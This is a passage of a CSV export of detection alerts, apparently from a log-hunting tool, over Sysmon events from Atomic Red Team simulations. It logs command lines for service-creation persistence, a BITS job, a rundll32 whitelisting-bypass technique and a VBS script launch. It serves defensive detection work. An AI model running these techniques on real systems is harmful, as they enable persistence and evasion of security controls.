<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D738-5D31-0000-001056A62600</Data>
<Data Name=""ParentProcessId"">2556</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:08.268803Z"">
</TimeCreated>
<EventRecordID>3580</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:08.227</Data>
<Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001056A62600</Data>
<Data Name=""ProcessId"">2556</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services using Sc.exe with Command Line (sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:08.185344Z"">
</TimeCreated>
<EventRecordID>3577</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence or Exec - Services Management</Data>
<Data Name=""UtcTime"">2019-07-19 14:44:08.181</Data>
<Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001098A22600</Data>
<Data Name=""ProcessId"">1700</Data>
<Data Name=""Image"">C:\Windows\System32\sc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Service Control Manager Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D738-5D31-0000-001046A02600</Data>
<Data Name=""ParentProcessId"">4216</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:08.161838Z"">
</TimeCreated>
<EventRecordID>3576</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:08.146</Data>
<Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001046A02600</Data>
<Data Name=""ProcessId"">4216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:41:17.339046Z"">
</TimeCreated>
<EventRecordID>1966563</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:41:17.288</Data>
<Data Name=""ProcessGuid"">365ABB72-61FD-5C91-0000-0010536A1200</Data>
<Data Name=""ProcessId"">2340</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.EXE /c malwr.vbs</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
<Data Name=""ParentProcessId"">484</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot;) in directory : ( c:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:43:03.303217Z"">
</TimeCreated>
<EventRecordID>3574</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:43:03.271</Data>
<Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ProcessId"">3912</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell</Data>
<Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
<Data Name=""ParentProcessId"">3764</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:43:03.303217Z"">
</TimeCreated>
<EventRecordID>3574</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:43:03.271</Data>
<Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ProcessId"">3912</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell</Data>
<Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
<Data Name=""ParentProcessId"">3764</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:42:53.295578Z"">
</TimeCreated>
<EventRecordID>3573</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:42:53.277</Data>
<Data Name=""ProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
<Data Name=""ProcessId"">3764</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4B8-5D31-0000-0010A8CE0600</Data>
<Data Name=""ParentProcessId"">4416</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /create AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:30.640915Z"">
</TimeCreated>
<EventRecordID>3657</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:30.619</Data>
<Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-0010F0D02E00</Data>
<Data Name=""ProcessId"">752</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /create AtomicBITS&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
</TimeCreated>
<EventRecordID>1966541</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
<Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
<Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
<Data Name=""ParentProcessId"">2984</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:22:28.886411Z"">
</TimeCreated>
<EventRecordID>1966541</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:22:28.806</Data>
<Data Name=""ProcessGuid"">365ABB72-5D94-5C91-0000-001080E90F00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb</Data>
<Data Name=""CurrentDirectory"">C:\Windows\AppPatch\Custom\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-543D-5C91-0000-001099A60300</Data>
<Data Name=""ParentProcessId"">2984</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
